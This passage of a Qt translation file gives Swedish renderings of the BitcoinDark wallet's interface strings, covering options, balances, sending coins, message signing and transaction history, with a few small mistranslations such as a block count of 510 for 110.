<translation>&Minimera till systemfältet istället för aktivitetsfältet</translation>
</message>
<message>
<location line="+7"/>
<source>Minimize instead of exit the application when the window is closed. When this option is enabled, the application will be closed only after selecting Quit in the menu.</source>
<translation>Minimera applikationen istället för att stänga ner den när fönstret stängs. Detta innebär att programmet fotrsätter att köras tills du väljer Avsluta i menyn.</translation>
</message>
<message>
<location line="+3"/>
<source>M&inimize on close</source>
<translation>M&inimera vid stängning</translation>
</message>
<message>
<location line="+21"/>
<source>&Display</source>
<translation>&Visa</translation>
</message>
<message>
<location line="+8"/>
<source>User Interface &language:</source>
<translation>Användargränssnittets &språk: </translation>
</message>
<message>
<location line="+13"/>
<source>The user interface language can be set here. This setting will take effect after restarting BitcoinDark.</source>
<translation>Användargränssnittets språk kan ställas in här. Inställningen börjar gälla efter omstart av BitcoinDark.</translation>
</message>
<message>
<location line="+11"/>
<source>&Unit to show amounts in:</source>
<translation>&Måttenhet att visa belopp i: </translation>
</message>
<message>
<location line="+13"/>
<source>Choose the default subdivision unit to show in the interface and when sending coins.</source>
<translation>Välj en måttenhet att visa när du skickar mynt.</translation>
</message>
<message>
<location line="+9"/>
<source>Whether to show BitcoinDark addresses in the transaction list or not.</source>
<translation>Om BitcoinDark adresser skall visas i transaktionslistan eller inte.</translation>
</message>
<message>
<location line="+3"/>
<source>&Display addresses in transaction list</source>
<translation>&Visa adresser i transaktionslistan</translation>
</message>
<message>
<location line="+7"/>
<source>Whether to show coin control features or not.</source>
<translation>Om coin kontrollinställningar skall visas eller inte.</translation>
</message>
<message>
<location line="+3"/>
<source>Display coin &control features (experts only!)</source>
<translation>Visa coin kontrollinställningar (endast avancerade användare!)</translation>
</message>
<message>
<location line="+71"/>
<source>&OK</source>
<translation>&OK</translation>
</message>
<message>
<location line="+7"/>
<source>&Cancel</source>
<translation>&Avbryt</translation>
</message>
<message>
<location line="+10"/>
<source>&Apply</source>
<translation>&Verkställ</translation>
</message>
<message>
<location filename="../optionsdialog.cpp" line="+55"/>
<source>default</source>
<translation>standard</translation>
</message>
<message>
<location line="+149"/>
<location line="+9"/>
<source>Warning</source>
<translation>Varning</translation>
</message>
<message>
<location line="-9"/>
<location line="+9"/>
<source>This setting will take effect after restarting BitcoinDark.</source>
<translation>Inställningen börjar gälla efter omstart av BitcoinDark.</translation>
</message>
<message>
<location line="+29"/>
<source>The supplied proxy address is invalid.</source>
<translation>Den medföljande proxy adressen är ogiltig.</translation>
</message>
</context>
<context>
<name>OverviewPage</name>
<message>
<location filename="../forms/overviewpage.ui" line="+14"/>
<source>Form</source>
<translation>Formulär</translation>
</message>
<message>
<location line="+33"/>
<location line="+231"/>
<source>The displayed information may be out of date. Your wallet automatically synchronizes with the BitcoinDark network after a connection is established, but this process has not completed yet.</source>
<translation>Den visade informationen kan vara gammal. Din plånbok synkroniseras automatiskt med BitcoinDark nätverket efter att en anslutning skapats, men denna process är inte klar än.</translation>
</message>
<message>
<location line="-160"/>
<source>Stake:</source>
<translation>Stake:</translation>
</message>
<message>
<location line="+29"/>
<source>Unconfirmed:</source>
<translation>Obekräftat:</translation>
</message>
<message>
<location line="-107"/>
<source>Wallet</source>
<translation>Plånbok</translation>
</message>
<message>
<location line="+49"/>
<source>Spendable:</source>
<translation>Spenderbart:</translation>
</message>
<message>
<location line="+16"/>
<source>Your current spendable balance</source>
<translation>Ditt tillgängliga saldo</translation>
</message>
<message>
<location line="+71"/>
<source>Immature:</source>
<translation>Omogen:</translation>
</message>
<message>
<location line="+13"/>
<source>Mined balance that has not yet matured</source>
<translation>Den genererade balansen som ännu inte har mognat</translation>
</message>
<message>
<location line="+20"/>
<source>Total:</source>
<translation>Totalt:</translation>
</message>
<message>
<location line="+16"/>
<source>Your current total balance</source>
<translation>Ditt nuvarande totala saldo</translation>
</message>
<message>
<location line="+46"/>
<source><b>Recent transactions</b></source>
<translation><b>Nyligen genomförda transaktioner</b></translation>
</message>
<message>
<location line="-108"/>
<source>Total of transactions that have yet to be confirmed, and do not yet count toward the current balance</source>
<translation>Totala antalet transaktioner inte har blivit bekräftade än och därför inte räknas mot det totala saldot</translation>
</message>
<message>
<location line="-29"/>
<source>Total of coins that was staked, and do not yet count toward the current balance</source>
<translation>Antal coins som var i stake-processen, och räknas ännu inte till nuvarande saldo</translation>
</message>
<message>
<location filename="../overviewpage.cpp" line="+113"/>
<location line="+1"/>
<source>out of sync</source>
<translation>osynkroniserad</translation>
</message>
</context>
<context>
<name>QRCodeDialog</name>
<message>
<location filename="../forms/qrcodedialog.ui" line="+14"/>
<source>QR Code Dialog</source>
<translation>QR-Kod Dialog</translation>
</message>
<message>
<location line="+59"/>
<source>Request Payment</source>
<translation>Begär Betalning</translation>
</message>
<message>
<location line="+56"/>
<source>Amount:</source>
<translation>Belopp:</translation>
</message>
<message>
<location line="-44"/>
<source>Label:</source>
<translation>Etikett:</translation>
</message>
<message>
<location line="+19"/>
<source>Message:</source>
<translation>Meddelande:</translation>
</message>
<message>
<location line="+71"/>
<source>&Save As...</source>
<translation>&Spara Som...</translation>
</message>
<message>
<location filename="../qrcodedialog.cpp" line="+62"/>
<source>Error encoding URI into QR Code.</source>
<translation>Fel vid skapande av QR-kod från URI.</translation>
</message>
<message>
<location line="+40"/>
<source>The entered amount is invalid, please check.</source>
<translation>Den angivna mängden är felaktig, var vänlig kontrollera.</translation>
</message>
<message>
<location line="+23"/>
<source>Resulting URI too long, try to reduce the text for label / message.</source>
<translation>URI:n är för lång, försök minska texten för etikett / meddelande.</translation>
</message>
<message>
<location line="+25"/>
<source>Save QR Code</source>
<translation>Spara QR-kod</translation>
</message>
<message>
<location line="+0"/>
<source>PNG Images (*.png)</source>
<translation>PNG Bilder (*.png)</translation>
</message>
</context>
<context>
<name>RPCConsole</name>
<message>
<location filename="../forms/rpcconsole.ui" line="+46"/>
<source>Client name</source>
<translation>Klientnamn</translation>
</message>
<message>
<location line="+10"/>
<location line="+23"/>
<location line="+26"/>
<location line="+23"/>
<location line="+23"/>
<location line="+36"/>
<location line="+53"/>
<location line="+23"/>
<location line="+23"/>
<location filename="../rpcconsole.cpp" line="+348"/>
<source>N/A</source>
<translation>ej tillgänglig</translation>
</message>
<message>
<location line="-217"/>
<source>Client version</source>
<translation>Klient-version</translation>
</message>
<message>
<location line="-45"/>
<source>&Information</source>
<translation>&Information</translation>
</message>
<message>
<location line="+68"/>
<source>Using OpenSSL version</source>
<translation>Använder OpenSSL version</translation>
</message>
<message>
<location line="+49"/>
<source>Startup time</source>
<translation>Uppstartstid</translation>
</message>
<message>
<location line="+29"/>
<source>Network</source>
<translation>Nätverk</translation>
</message>
<message>
<location line="+7"/>
<source>Number of connections</source>
<translation>Antalet anslutningar</translation>
</message>
<message>
<location line="+23"/>
<source>On testnet</source>
<translation>På testnet</translation>
</message>
<message>
<location line="+23"/>
<source>Block chain</source>
<translation>Blockkedja</translation>
</message>
<message>
<location line="+7"/>
<source>Current number of blocks</source>
<translation>Aktuellt antal block</translation>
</message>
<message>
<location line="+23"/>
<source>Estimated total blocks</source>
<translation>Beräknade totala block</translation>
</message>
<message>
<location line="+23"/>
<source>Last block time</source>
<translation>Sista blocktid</translation>
</message>
<message>
<location line="+52"/>
<source>&Open</source>
<translation>&Öppna</translation>
</message>
<message>
<location line="+16"/>
<source>Command-line options</source>
<translation>Kommandoradsalternativ</translation>
</message>
<message>
<location line="+7"/>
<source>Show the BitcoinDark-Qt help message to get a list with possible BitcoinDark command-line options.</source>
<translation>Visa BitcoinDark-Qt hjälp meddelandet för att få en lista över möjliga BitcoinDark kommandoradsalternativ.</translation>
</message>
<message>
<location line="+3"/>
<source>&Show</source>
<translation>&Visa</translation>
</message>
<message>
<location line="+24"/>
<source>&Console</source>
<translation>&Konsol</translation>
</message>
<message>
<location line="-260"/>
<source>Build date</source>
<translation>Kompileringsdatum</translation>
</message>
<message>
<location line="-104"/>
<source>BitcoinDark - Debug window</source>
<translation>BitcoinDark - Felsökningsfönster</translation>
</message>
<message>
<location line="+25"/>
<source>BitcoinDark Core</source>
<translation>BitcoinDark Core</translation>
</message>
<message>
<location line="+279"/>
<source>Debug log file</source>
<translation>Debugloggfil</translation>
</message>
<message>
<location line="+7"/>
<source>Open the BitcoinDark debug log file from the current data directory. This can take a few seconds for large log files.</source>
<translation>Öppna BitcoinDark felsöknings-loggfilen från nuvarande data mapp. Detta kan kan ta ett par minuter för stora log filer.</translation>
</message>
<message>
<location line="+102"/>
<source>Clear console</source>
<translation>Rensa konsollen</translation>
</message>
<message>
<location filename="../rpcconsole.cpp" line="-33"/>
<source>Welcome to the BitcoinDark RPC console.</source>
<translation>Välkommen till BitcoinDark RPC konsoll.</translation>
</message>
<message>
<location line="+1"/>
<source>Use up and down arrows to navigate history, and <b>Ctrl-L</b> to clear screen.</source>
<translation>Använd upp- och ner-pilarna för att navigera i historiken, och <b>Ctrl-L</b> för att rensa skärmen.</translation>
</message>
<message>
<location line="+1"/>
<source>Type <b>help</b> for an overview of available commands.</source>
<translation>Skriv <b>help</b> för en översikt av alla kommandon.</translation>
</message>
</context>
<context>
<name>SendCoinsDialog</name>
<message>
<location filename="../forms/sendcoinsdialog.ui" line="+14"/>
<location filename="../sendcoinsdialog.cpp" line="+182"/>
<location line="+5"/>
<location line="+5"/>
<location line="+5"/>
<location line="+6"/>
<location line="+5"/>
<location line="+5"/>
<source>Send Coins</source>
<translation>Skicka pengar</translation>
</message>
<message>
<location line="+76"/>
<source>Coin Control Features</source>
<translation>Coin kontrollinställningar</translation>
</message>
<message>
<location line="+20"/>
<source>Inputs...</source>
<translation>Ingångar...</translation>
</message>
<message>
<location line="+7"/>
<source>automatically selected</source>
<translation>automatiskt vald</translation>
</message>
<message>
<location line="+19"/>
<source>Insufficient funds!</source>
<translation>Otillräckligt saldo!</translation>
</message>
<message>
<location line="+77"/>
<source>Quantity:</source>
<translation>Antal:</translation>
</message>
<message>
<location line="+22"/>
<location line="+35"/>
<source>0</source>
<translation>0</translation>
</message>
<message>
<location line="-19"/>
<source>Bytes:</source>
<translation>Bytes:</translation>
</message>
<message>
<location line="+51"/>
<source>Amount:</source>
<translation>Belopp:</translation>
</message>
<message>
<location line="+22"/>
<location line="+86"/>
<location line="+86"/>
<location line="+32"/>
<source>0.00 BC</source>
<translation>123.456 BC {0.00 ?}</translation>
</message>
<message>
<location line="-191"/>
<source>Priority:</source>
<translation>Prioritet:</translation>
</message>
<message>
<location line="+19"/>
<source>medium</source>
<translation>mellan</translation>
</message>
<message>
<location line="+32"/>
<source>Fee:</source>
<translation>Avgift:</translation>
</message>
<message>
<location line="+35"/>
<source>Low Output:</source>
<translation>Låg utmatning:</translation>
</message>
<message>
<location line="+19"/>
<source>no</source>
<translation>nej</translation>
</message>
<message>
<location line="+32"/>
<source>After Fee:</source>
<translation>Efter avgift:</translation>
</message>
<message>
<location line="+35"/>
<source>Change</source>
<translation>Ändra</translation>
</message>
<message>
<location line="+50"/>
<source>custom change address</source>
<translation>egen ändringsadress</translation>
</message>
<message>
<location line="+106"/>
<source>Send to multiple recipients at once</source>
<translation>Skicka till flera mottagare samtidigt</translation>
</message>
<message>
<location line="+3"/>
<source>Add &Recipient</source>
<translation>Lägg till &mottagare</translation>
</message>
<message>
<location line="+20"/>
<source>Remove all transaction fields</source>
<translation>Ta bort alla transaktionsfält</translation>
</message>
<message>
<location line="+3"/>
<source>Clear &All</source>
<translation>Rensa &alla</translation>
</message>
<message>
<location line="+28"/>
<source>Balance:</source>
<translation>Balans:</translation>
</message>
<message>
<location line="+16"/>
<source>123.456 BC</source>
<translation>123.456 BC</translation>
</message>
<message>
<location line="+31"/>
<source>Confirm the send action</source>
<translation>Bekräfta sändordern</translation>
</message>
<message>
<location line="+3"/>
<source>S&end</source>
<translation>&Skicka</translation>
</message>
<message>
<location filename="../sendcoinsdialog.cpp" line="-173"/>
<source>Enter a BitcoinDark address (e.g. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</source>
<translation>Fyll i en BitcoinDark adress (t.ex. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</translation>
</message>
<message>
<location line="+15"/>
<source>Copy quantity</source>
<translation>Kopiera antal</translation>
</message>
<message>
<location line="+1"/>
<source>Copy amount</source>
<translation>Kopiera belopp</translation>
</message>
<message>
<location line="+1"/>
<source>Copy fee</source>
<translation>Kopiera avgift</translation>
</message>
<message>
<location line="+1"/>
<source>Copy after fee</source>
<translation>Kopiera efter avgift</translation>
</message>
<message>
<location line="+1"/>
<source>Copy bytes</source>
<translation>Kopiera bytes</translation>
</message>
<message>
<location line="+1"/>
<source>Copy priority</source>
<translation>Kopiera prioritet</translation>
</message>
<message>
<location line="+1"/>
<source>Copy low output</source>
<translation>Kopiera låg utmatning</translation>
</message>
<message>
<location line="+1"/>
<source>Copy change</source>
<translation>Kopiera ändring</translation>
</message>
<message>
<location line="+86"/>
<source><b>%1</b> to %2 (%3)</source>
<translation><b>%1</b> till %2 (%3)</translation>
</message>
<message>
<location line="+5"/>
<source>Confirm send coins</source>
<translation>Bekräfta skickade mynt</translation>
</message>
<message>
<location line="+1"/>
<source>Are you sure you want to send %1?</source>
<translation>Är du säker att du vill skicka %1?</translation>
</message>
<message>
<location line="+0"/>
<source> and </source>
<translation>och</translation>
</message>
<message>
<location line="+29"/>
<source>The recipient address is not valid, please recheck.</source>
<translation>Mottagarens adress är inte giltig, vänligen kontrollera igen.</translation>
</message>
<message>
<location line="+5"/>
<source>The amount to pay must be larger than 0.</source>
<translation>Det betalade beloppet måste vara större än 0.</translation>
</message>
<message>
<location line="+5"/>
<source>The amount exceeds your balance.</source>
<translation>Värdet överstiger ditt saldo.</translation>
</message>
<message>
<location line="+5"/>
<source>The total exceeds your balance when the %1 transaction fee is included.</source>
<translation>Totalvärdet överstiger ditt saldo när transaktionsavgiften %1 är pålagd.</translation>
</message>
<message>
<location line="+6"/>
<source>Duplicate address found, can only send to each address once per send operation.</source>
<translation>Dubblett av adress funnen, kan bara skicka till varje adress en gång per sändning.</translation>
</message>
<message>
<location line="+5"/>
<source>Error: Transaction creation failed.</source>
<translation>Fel: Transaktionen kunde inte skapas.</translation>
</message>
<message>
<location line="+5"/>
<source>Error: The transaction was rejected. This might happen if some of the coins in your wallet were already spent, such as if you used a copy of wallet.dat and coins were spent in the copy but not marked as spent here.</source>
<translation>Fel: Transaktionen nekades. Detta kan hända om vissa av mynten i din plånbok redan är använda, t.ex om du använder en kopia av wallet.dat och mynten redan var använda i kopia men inte markerade som använda här.</translation>
</message>
<message>
<location line="+251"/>
<source>WARNING: Invalid BitcoinDark address</source>
<translation>VARNING: Ogiltig BitcoinDark adress</translation>
</message>
<message>
<location line="+13"/>
<source>(no label)</source>
<translation>(Ingen etikett)</translation>
</message>
<message>
<location line="+4"/>
<source>WARNING: unknown change address</source>
<translation>VARNING: okänd ändringsadress</translation>
</message>
</context>
<context>
<name>SendCoinsEntry</name>
<message>
<location filename="../forms/sendcoinsentry.ui" line="+14"/>
<source>Form</source>
<translation>Formulär</translation>
</message>
<message>
<location line="+15"/>
<source>A&mount:</source>
<translation>&Belopp:</translation>
</message>
<message>
<location line="+13"/>
<source>Pay &To:</source>
<translation>Betala &Till:</translation>
</message>
<message>
<location line="+24"/>
<location filename="../sendcoinsentry.cpp" line="+25"/>
<source>Enter a label for this address to add it to your address book</source>
<translation>Ange ett namn för den här adressen och lägg till den i din adressbok</translation>
</message>
<message>
<location line="+9"/>
<source>&Label:</source>
<translation>&Etikett:</translation>
</message>
<message>
<location line="+18"/>
<source>The address to send the payment to (e.g. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</source>
<translation>Adressen att skicka betalningen till (t.ex. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</translation>
</message>
<message>
<location line="+10"/>
<source>Choose address from address book</source>
<translation>Välj adress från adressbok</translation>
</message>
<message>
<location line="+10"/>
<source>Alt+A</source>
<translation>Alt+A</translation>
</message>
<message>
<location line="+7"/>
<source>Paste address from clipboard</source>
<translation>Klistra in adress från Urklipp</translation>
</message>
<message>
<location line="+10"/>
<source>Alt+P</source>
<translation>Alt+P</translation>
</message>
<message>
<location line="+7"/>
<source>Remove this recipient</source>
<translation>Ta bort denna mottagare</translation>
</message>
<message>
<location filename="../sendcoinsentry.cpp" line="+1"/>
<source>Enter a BitcoinDark address (e.g. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</source>
<translation>Fyll i en BitcoinDark adress (t.ex. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</translation>
</message>
</context>
<context>
<name>SignVerifyMessageDialog</name>
<message>
<location filename="../forms/signverifymessagedialog.ui" line="+14"/>
<source>Signatures - Sign / Verify a Message</source>
<translation>Signaturer - Signera / Verifiera ett Meddelande</translation>
</message>
<message>
<location line="+13"/>
<location line="+124"/>
<source>&Sign Message</source>
<translation>&Signera Meddelande</translation>
</message>
<message>
<location line="-118"/>
<source>You can sign messages with your addresses to prove you own them. Be careful not to sign anything vague, as phishing attacks may try to trick you into signing your identity over to them. Only sign fully-detailed statements you agree to.</source>
<translation>Du kan signera meddelanden med dina adresser för att bevisa att du äger dem. Var försiktig med vad du signerar eftersom phising-attacker kan försöka få dig att skriva över din identitet till någon annan. Signera bara väldetaljerade påståenden du kan gå i god för.</translation>
</message>
<message>
<location line="+18"/>
<source>The address to sign the message with (e.g. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</source>
<translation>Adressen att signera meddelandet med (t.ex. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</translation>
</message>
<message>
<location line="+10"/>
<location line="+203"/>
<source>Choose an address from the address book</source>
<translation>Välj en adress från adressboken</translation>
</message>
<message>
<location line="-193"/>
<location line="+203"/>
<source>Alt+A</source>
<translation>Alt+A</translation>
</message>
<message>
<location line="-193"/>
<source>Paste address from clipboard</source>
<translation>Klistra in adress från Urklipp</translation>
</message>
<message>
<location line="+10"/>
<source>Alt+P</source>
<translation>Alt+P</translation>
</message>
<message>
<location line="+12"/>
<source>Enter the message you want to sign here</source>
<translation>Skriv in meddelandet du vill signera här</translation>
</message>
<message>
<location line="+24"/>
<source>Copy the current signature to the system clipboard</source>
<translation>Kopiera signaturen till systemets Urklipp</translation>
</message>
<message>
<location line="+21"/>
<source>Sign the message to prove you own this BitcoinDark address</source>
<translation>Signera meddelandet för att verifiera att du äger denna BitcoinDark adressen</translation>
</message>
<message>
<location line="+17"/>
<source>Reset all sign message fields</source>
<translation>Rensa alla fält</translation>
</message>
<message>
<location line="+3"/>
<location line="+146"/>
<source>Clear &All</source>
<translation>Rensa &alla</translation>
</message>
<message>
<location line="-87"/>
<location line="+70"/>
<source>&Verify Message</source>
<translation>&Verifiera Meddelande</translation>
</message>
<message>
<location line="-64"/>
<source>Enter the signing address, message (ensure you copy line breaks, spaces, tabs, etc. exactly) and signature below to verify the message. Be careful not to read more into the signature than what is in the signed message itself, to avoid being tricked by a man-in-the-middle attack.</source>
<translation>Skriv in din adress, meddelande (se till att du kopierar radbrytningar, mellanslag, tabbar, osv. exakt) och signatur nedan för att verifiera meddelandet. Var noga med att inte läsa in mer i signaturen än vad som finns i det signerade meddelandet, för att undvika att luras av en man-in-the-middle attack.</translation>
</message>
<message>
<location line="+21"/>
<source>The address the message was signed with (e.g. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</source>
<translation>Adressen meddelandet var signerad med (t.ex. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</translation>
</message>
<message>
<location line="+40"/>
<source>Verify the message to ensure it was signed with the specified BitcoinDark address</source>
<translation>Verifiera meddelandet för att vara säker på att det var signerat med den angivna BitcoinDark adressen</translation>
</message>
<message>
<location line="+17"/>
<source>Reset all verify message fields</source>
<translation>Rensa alla fält</translation>
</message>
<message>
<location filename="../signverifymessagedialog.cpp" line="+27"/>
<location line="+3"/>
<source>Enter a BitcoinDark address (e.g. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</source>
<translation>Fyll i en BitcoinDark adress (t.ex. RJhbfkAFvXqYkreSgJfrRLS9DepUcxbQci)</translation>
</message>
<message>
<location line="-2"/>
<source>Click "Sign Message" to generate signature</source>
<translation>Klicka "Signera Meddelande" för att få en signatur</translation>
</message>
<message>
<location line="+3"/>
<source>Enter BitcoinDark signature</source>
<translation>Fyll i BitcoinDark signatur</translation>
</message>
<message>
<location line="+82"/>
<location line="+81"/>
<source>The entered address is invalid.</source>
<translation>Den angivna adressen är ogiltig.</translation>
</message>
<message>
<location line="-81"/>
<location line="+8"/>
<location line="+73"/>
<location line="+8"/>
<source>Please check the address and try again.</source>
<translation>Vad god kontrollera adressen och försök igen.</translation>
</message>
<message>
<location line="-81"/>
<location line="+81"/>
<source>The entered address does not refer to a key.</source>
<translation>Den angivna adressen refererar inte till en nyckel.</translation>
</message>
<message>
<location line="-73"/>
<source>Wallet unlock was cancelled.</source>
<translation>Upplåsningen av plånboken avbröts.</translation>
</message>
<message>
<location line="+8"/>
<source>Private key for the entered address is not available.</source>
<translation>Privata nyckel för den angivna adressen är inte tillgänglig.</translation>
</message>
<message>
<location line="+12"/>
<source>Message signing failed.</source>
<translation>Signeringen av meddelandet misslyckades.</translation>
</message>
<message>
<location line="+5"/>
<source>Message signed.</source>
<translation>Meddelandet är signerat.</translation>
</message>
<message>
<location line="+59"/>
<source>The signature could not be decoded.</source>
<translation>Signaturen kunde inte avkodas.</translation>
</message>
<message>
<location line="+0"/>
<location line="+13"/>
<source>Please check the signature and try again.</source>
<translation>Kontrollera signaturen och försök igen.</translation>
</message>
<message>
<location line="+0"/>
<source>The signature did not match the message digest.</source>
<translation>Signaturen matchade inte meddelandesammanfattningen.</translation>
</message>
<message>
<location line="+7"/>
<source>Message verification failed.</source>
<translation>Meddelandet verifikation misslyckades.</translation>
</message>
<message>
<location line="+5"/>
<source>Message verified.</source>
<translation>Meddelandet är verifierad.</translation>
</message>
</context>
<context>
<name>TransactionDesc</name>
<message>
<location filename="../transactiondesc.cpp" line="+19"/>
<source>Open until %1</source>
<translation>Öppet till %1</translation>
</message>
<message numerus="yes">
<location line="-2"/>
<source>Open for %n block(s)</source>
<translation><numerusform>Öppen för %n block</numerusform><numerusform>Öppen för %n block</numerusform></translation>
</message>
<message>
<location line="+8"/>
<source>conflicted</source>
<translation>konflikt</translation>
</message>
<message>
<location line="+2"/>
<source>%1/offline</source>
<translation>%1/nerkopplad</translation>
</message>
<message>
<location line="+2"/>
<source>%1/unconfirmed</source>
<translation>%1/obekräftade</translation>
</message>
<message>
<location line="+2"/>
<source>%1 confirmations</source>
<translation>%1 bekräftelser</translation>
</message>
<message>
<location line="+18"/>
<source>Status</source>
<translation>Status</translation>
</message>
<message numerus="yes">
<location line="+7"/>
<source>, broadcast through %n node(s)</source>
<translation><numerusform>, sänd genom %n nod</numerusform><numerusform>, sänd genom %n noder</numerusform></translation>
</message>
<message>
<location line="+4"/>
<source>Date</source>
<translation>Datum</translation>
</message>
<message>
<location line="+7"/>
<source>Source</source>
<translation>Källa</translation>
</message>
<message>
<location line="+0"/>
<source>Generated</source>
<translation>Genererad</translation>
</message>
<message>
<location line="+5"/>
<location line="+17"/>
<source>From</source>
<translation>Från</translation>
</message>
<message>
<location line="+1"/>
<location line="+22"/>
<location line="+58"/>
<source>To</source>
<translation>Till</translation>
</message>
<message>
<location line="-77"/>
<location line="+2"/>
<source>own address</source>
<translation>egen adress</translation>
</message>
<message>
<location line="-2"/>
<source>label</source>
<translation>etikett</translation>
</message>
<message>
<location line="+37"/>
<location line="+12"/>
<location line="+45"/>
<location line="+17"/>
<location line="+30"/>
<source>Credit</source>
<translation>Kredit</translation>
</message>
<message numerus="yes">
<location line="-102"/>
<source>matures in %n more block(s)</source>
<translation><numerusform>mognar om %n block</numerusform><numerusform>mognar om %n fler block</numerusform></translation>
</message>
<message>
<location line="+2"/>
<source>not accepted</source>
<translation>inte accepterad</translation>
</message>
<message>
<location line="+44"/>
<location line="+8"/>
<location line="+15"/>
<location line="+30"/>
<source>Debit</source>
<translation>Belasta</translation>
</message>
<message>
<location line="-39"/>
<source>Transaction fee</source>
<translation>Transaktionsavgift</translation>
</message>
<message>
<location line="+16"/>
<source>Net amount</source>
<translation>Nettobelopp</translation>
</message>
<message>
<location line="+6"/>
<source>Message</source>
<translation>Meddelande</translation>
</message>
<message>
<location line="+2"/>
<source>Comment</source>
<translation>Kommentar</translation>
</message>
<message>
<location line="+2"/>
<source>Transaction ID</source>
<translation>Transaktions-ID</translation>
</message>
<message>
<location line="+3"/>
<source>Generated coins must mature 110 blocks before they can be spent. When you generated this block, it was broadcast to the network to be added to the block chain. If it fails to get into the chain, its state will change to "not accepted" and it won't be spendable. This may occasionally happen if another node generates a block within a few seconds of yours.</source>
<translation>Genererad mynt måste mogna i 510 block före de kan användas. När du genererade detta blocket sändes det ut till nätverket för att läggas till i blockkedjan. Om det inte kan läggas till i kedjan kommer dess status att ändras till "Ej accepterat" och det kommer inte gå att använda. Detta kan hända imellanåt om en annan klient genererar ett block inom ett par sekunder från ditt.</translation>
</message>
<message>
<location line="+7"/>
<source>Debug information</source>
<translation>Debug information</translation>
</message>
<message>
<location line="+8"/>
<source>Transaction</source>
<translation>Transaktion</translation>
</message>
<message>
<location line="+5"/>
<source>Inputs</source>
<translation>Inputs</translation>
</message>
<message>
<location line="+23"/>
<source>Amount</source>
<translation>Mängd</translation>
</message>
<message>
<location line="+1"/>
<source>true</source>
<translation>sant</translation>
</message>
<message>
<location line="+0"/>
<source>false</source>
<translation>falsk</translation>
</message>
<message>
<location line="-211"/>
<source>, has not been successfully broadcast yet</source>
<translation>, har inte lyckats skickas ännu</translation>
</message>
<message>
<location line="+35"/>
<source>unknown</source>
<translation>okänd</translation>
</message>
</context>
<context>
<name>TransactionDescDialog</name>
<message>
<location filename="../forms/transactiondescdialog.ui" line="+14"/>
<source>Transaction details</source>
<translation>Transaktionsdetaljer</translation>
</message>
<message>
<location line="+6"/>
<source>This pane shows a detailed description of the transaction</source>
<translation>Den här panelen visar en detaljerad beskrivning av transaktionen</translation>
</message>
</context>
<context>
<name>TransactionTableModel</name>
<message>
<location filename="../transactiontablemodel.cpp" line="+226"/>
<source>Date</source>
<translation>Datum</translation>
</message>
<message>
<location line="+0"/>
<source>Type</source>
<translation>Typ</translation>
</message>
<message>
<location line="+0"/>
<source>Address</source>
<translation>Adress</translation>
</message>
<message>
<location line="+0"/>
<source>Amount</source>
<translation>Mängd</translation>
</message>
<message>
<location line="+60"/>
<source>Open until %1</source>
<translation>Öppet till %1</translation>
</message>
<message>
<location line="+12"/>
<source>Confirmed (%1 confirmations)</source>
<translation>Bekräftad (%1 bekräftelser)</translation>
</message>
<message numerus="yes">
<location line="-15"/>
<source>Open for %n more block(s)</source>
<translation><numerusform>Öppet för %n mer block</numerusform><numerusform>Öppet för %n mer block</numerusform></translation>
</message>
<message>
<location line="+6"/>
<source>Offline</source>
<translation>Nerkopplad</translation>
</message>
<message>
<location line="+3"/>
<source>Unconfirmed</source>
<translation>Obekräftad</translation>
</message>
<message>
<location line="+3"/>
<source>Confirming (%1 of %2 recommended confirmations)</source>
<translation>Bekräftar (%1 av %2 rekommenderade bekräftelser)</translation>
</message>
<message>
<location line="+6"/>
<source>Conflicted</source>
<translation>Konflikt</translation>
</message>
<message>
<location line="+3"/>
<source>Immature (%1 confirmations, will be available after %2)</source>
<translation>Omogen (%1 bekräftningar, kommer bli tillgänglig efter %2)</translation>
</message>
<message>
<location line="+3"/>
<source>This block was not received by any other nodes and will probably not be accepted!</source>
<translation>Det här blocket togs inte emot av några andra noder och kommer antagligen inte att bli godkänt.</translation>
</message>
<message>
<location line="+3"/>
<source>Generated but not accepted</source>
<translation>Genererad men inte accepterad</translation>
</message>
<message>
<location line="+42"/>
<source>Received with</source>
<translation>Mottagen med</translation>
</message>
<message>
<location line="+2"/>
<source>Received from</source>
<translation>Mottaget från</translation>
</message>
<message>
<location line="+3"/>
<source>Sent to</source>
<translation>Skickad till</translation>
</message>
<message>
<location line="+2"/>
<source>Payment to yourself</source>
<translation>Betalning till dig själv</translation>
</message>
<message>
<location line="+2"/>
<source>Mined</source>
<translation>Genererade</translation>
</message>
<message>
<location line="+38"/>
<source>(n/a)</source>
<translation>(n/a)</translation>
</message>
<message>
<location line="+190"/>
<source>Transaction status. Hover over this field to show number of confirmations.</source>
<translation>Transaktionsstatus. Håll muspekaren över för att se antal bekräftelser.</translation>
</message>
<message>
<location line="+2"/>
<source>Date and time that the transaction was received.</source>
<translation>Tidpunkt då transaktionen mottogs.</translation>
</message>
<message>
<location line="+2"/>
<source>Type of transaction.</source>
<translation>Transaktionstyp.</translation>
</message>
<message>
<location line="+2"/>
<source>Destination address of transaction.</source>
<translation>Transaktionens destinationsadress.</translation>
</message>
<message>
<location line="+2"/>
<source>Amount removed from or added to balance.</source>
<translation>Belopp draget eller tillagt till balans.</translation>
</message>
</context>
<context>
<name>TransactionView</name>
<message>
<location filename="../transactionview.cpp" line="+55"/>
<location line="+16"/>
<source>All</source>
<translation>Alla</translation>
</message>
<message>
<location line="-15"/>
<source>Today</source>
<translation>Idag</translation>
</message>
<message>
<location line="+1"/>
<source>This week</source>
<translation>Denna vecka</translation>
</message>
<message>
<location line="+1"/>
<source>This month</source>
<translation>Denna månad</translation>
</message>
<message>
<location line="+1"/>
<source>Last month</source>
<translation>Föregående månad</translation>
</message>
<message>
<location line="+1"/>
<source>This year</source>
<translation>Det här året</translation>
</message>
<message>
<location line="+1"/>
<source>Range...</source>
<translation>Period...</translation>
</message>
<message>
<location line="+11"/>
<source>Received with</source>
<translation>Mottagen med</translation>
</message>
<message>
<location line="+2"/>
<source>Sent to</source>
<translation>Skickad till</translation>
</message>
